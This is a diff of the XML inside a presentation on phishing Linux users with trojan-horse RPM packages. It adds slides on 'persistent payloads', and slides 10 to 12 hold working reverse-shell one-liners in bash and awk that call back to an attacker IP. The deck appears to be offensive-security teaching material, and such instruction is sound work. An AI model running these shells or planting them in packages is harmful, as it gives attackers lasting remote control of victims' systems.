--- a/Offensive Security Tactics for Linux Professionals - Phishing with Trojan Horse RPM Packages.pptx
+++ b/Offensive Security Tactics for Linux Professionals - Phishing with Trojan Horse RPM Packages.pptx
@@ -11,7 +11,13 @@
     <p:sldId id="259" r:id="rId5"/>
     <p:sldId id="260" r:id="rId6"/>
     <p:sldId id="261" r:id="rId7"/>
-    <p:sldId id="262" r:id="rId8"/>
+    <p:sldId id="264" r:id="rId8"/>
+    <p:sldId id="263" r:id="rId9"/>
+    <p:sldId id="265" r:id="rId10"/>
+    <p:sldId id="267" r:id="rId11"/>
+    <p:sldId id="268" r:id="rId12"/>
+    <p:sldId id="266" r:id="rId13"/>
+    <p:sldId id="262" r:id="rId14"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -110,6 +116,11 @@
       </a:defRPr>
     </a:lvl9pPr>
   </p:defaultTextStyle>
+  <p:extLst>
+    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
+      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main"/>
+    </p:ext>
+  </p:extLst>
 </p:presentation>
 </file>
 
@@ -899,7 +910,7 @@
 <dgm:dataModel xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
   <dgm:ptLst>
     <dgm:pt modelId="{C2950A35-954C-4E18-BAA2-BFA1E6232BF4}" type="doc">
-      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/list1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful2" csCatId="colorful"/>
+      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/list1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful2" csCatId="colorful" phldr="1"/>
       <dgm:spPr/>
       <dgm:t>
         <a:bodyPr/>
@@ -1029,7 +1040,7 @@
         <a:p>
           <a:r>
             <a:rPr lang="en-GB" dirty="0"/>
-            <a:t>Persistent/Automated Payloads</a:t>
+            <a:t>Persistent Payloads</a:t>
           </a:r>
           <a:endParaRPr lang="en-US" dirty="0"/>
         </a:p>
@@ -1833,7 +1844,7 @@
           </a:pPr>
           <a:r>
             <a:rPr lang="en-GB" sz="2400" kern="1200" dirty="0"/>
-            <a:t>Persistent/Automated Payloads</a:t>
+            <a:t>Persistent Payloads</a:t>
           </a:r>
           <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
         </a:p>
@@ -3385,7 +3396,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3583,7 +3594,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3791,7 +3802,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3989,7 +4000,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4264,7 +4275,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4534,7 +4545,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4954,7 +4965,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5095,7 +5106,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5208,7 +5219,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5519,7 +5530,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -5807,7 +5818,7 @@
           <a:p>
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -6048,7 +6059,7 @@
             <a:fld id="{2F3E8B1C-86EF-43CF-8304-249481088644}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>12/12/2021</a:t>
+              <a:t>12/19/2021</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -6909,6 +6920,446 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide10.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{082D2187-4EE3-4414-9EE8-A1DFD665686A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>Persistent payload 2 – Bash reverse shell</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01868B80-3B18-4D68-8003-75A63006D933}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>nohup</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> bash -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> &gt;&amp; /dev/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>tcp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>/192.168.0.70/8080 0&gt;&amp;1 &amp; disown; exit</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2390034608"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{082D2187-4EE3-4414-9EE8-A1DFD665686A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>Persistent payload 2 – Bash reverse shell</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01868B80-3B18-4D68-8003-75A63006D933}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>nohup</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> bash -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> &gt;&amp; /dev/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>tcp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>/192.168.0.70/8080 0&gt;&amp;1 &amp; disown; exit</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3177144499"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{082D2187-4EE3-4414-9EE8-A1DFD665686A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>Persistent payload 3 – Awk one liner</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01868B80-3B18-4D68-8003-75A63006D933}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>nohup</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> awk 'BEGIN {s = "/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>inet</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>tcp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>/0/192.168.0.70/8080"; while(42) { do{ </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>printf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> "shell&gt;" |&amp; s; s |&amp; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>getline</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> c; if(c){ while ((c |&amp; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>getline</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>) &gt; 0) print $0 |&amp; s; close(c); } } while(c != "exit") close(s); }}' &gt; /dev/null 2&gt;&amp;1 &amp; disown; exit</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104959600"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C476D84-9518-4927-A006-581DF5AA232B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>Perhaps an embedded video which will show the target downloading </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB"/>
+              <a:t>the payload.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49581CAF-5667-4411-824B-725299B6256C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-GB" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2129268817"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -7114,7 +7565,7 @@
             <p:ph idx="1"/>
             <p:extLst>
               <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
-                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188847802"/>
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1004164684"/>
               </p:ext>
             </p:extLst>
           </p:nvPr>
@@ -7498,7 +7949,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" sz="5400" dirty="0"/>
-              <a:t>Components of RPM package</a:t>
+              <a:t>Components of an RPM package</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -7653,31 +8104,6 @@
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C0D41BF-3855-4F40-9B50-BB87339A6104}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="en-GB"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -7800,7 +8226,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C476D84-9518-4927-A006-581DF5AA232B}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B628FEE7-3C4F-498C-A237-CB6C326142F7}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -7809,40 +8235,6 @@
           </p:cNvSpPr>
           <p:nvPr>
             <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0"/>
-              <a:t>Perhaps an embedded video which will show the target downloading </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB"/>
-              <a:t>the payload.</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49581CAF-5667-4411-824B-725299B6256C}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
@@ -7850,14 +8242,259 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-GB"/>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>What is a persistent payload</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{528A222B-FBB4-4E2B-8F7B-BC9DB11E9F8A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>A payload which allows continuous access to the target system</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-GB" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>Common payloads which involve reverse shells can be easily killed using accidental calls of SIGKILL or lack of configuration to prevent SIGKILL from causing a killed connection.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-GB" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB"/>
+              <a:t>Persistent payloads </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-GB" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2129268817"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3477250531"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{082D2187-4EE3-4414-9EE8-A1DFD665686A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>Persistent payload 1</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
